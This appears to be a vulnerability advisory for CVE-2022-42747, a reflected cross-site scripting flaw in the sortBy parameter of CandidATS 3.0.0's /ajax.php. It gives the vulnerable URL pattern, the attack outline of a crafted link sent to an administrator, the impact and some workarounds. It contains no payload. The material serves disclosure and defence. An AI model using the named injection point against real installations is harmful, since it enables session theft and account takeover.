CVE-2022-42747

Vulnerability

CandidATS version 3.0.0 contains a reflected cross-site scripting (XSS) vulnerability in the sortBy parameter of the /ajax.php resource [2]. The application fails to properly validate user input, allowing arbitrary JavaScript to be injected into the page. The vulnerable URL pattern is /ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=&sortDirection=desc&indexFile=... [2].

Exploitation

An unauthenticated remote attacker can craft a malicious link containing JavaScript in the sortBy parameter [2]. To trigger the vulnerability, the attacker must convince an authenticated administrator to click the link (user interaction required) [2]. The attacker has no special network position or authentication requirements; the link can be delivered via email, chat, or other means [2].

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's session, leading to cookie theft and subsequent account takeover [2]. The attacker gains the privileges of the victim, which for an administrator account means full control over the CandidATS installation [2]. This compromises confidentiality, integrity, and availability of the system.

Mitigation

At the time of disclosure (October 26, 2022), no patch was available [2]. The vendor (CandidATS) was contacted on October 7, 2022, but no fix has been publicly released [2]. Users should monitor the CandidATS website [1] for updates and consider restricting access to /ajax.php or implementing a web application firewall (WAF) rule to filter malicious input as a temporary workaround.